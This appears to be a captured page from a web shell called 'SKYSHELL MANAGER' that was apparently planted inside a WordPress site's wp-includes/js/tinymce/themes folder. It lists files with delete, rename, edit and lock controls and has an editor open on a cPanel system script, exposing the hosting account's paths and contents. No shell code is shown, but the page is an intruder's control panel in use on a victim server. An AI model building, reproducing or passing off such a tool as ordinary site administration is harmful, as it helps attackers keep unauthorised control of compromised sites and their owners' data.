📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
21171.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: safe_dump_pickle
#!/usr/bin/python3 # cpanel - bin/safe_dump_pickle Copyright 2022 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited import sys sys.path.insert(0, '/usr/local/cpanel/lib/python3') import cPanel MAX_PICKLE_FILE_SIZE = 1024 * 1024 * 32 def main(argv): if len(argv) < 3: print('usage: safe_dump_pickle <file> <sysuser>') return 1 filename = argv[1] sysuser = argv[2] sys.stdout.buffer.write(cPanel.json_to_pickle(cPanel.export_pickle_as_json(filename, sysuser, MAX_PICKLE_FILE_SIZE))) if __name__ == '__main__': raise SystemExit(main(sys.argv))
Save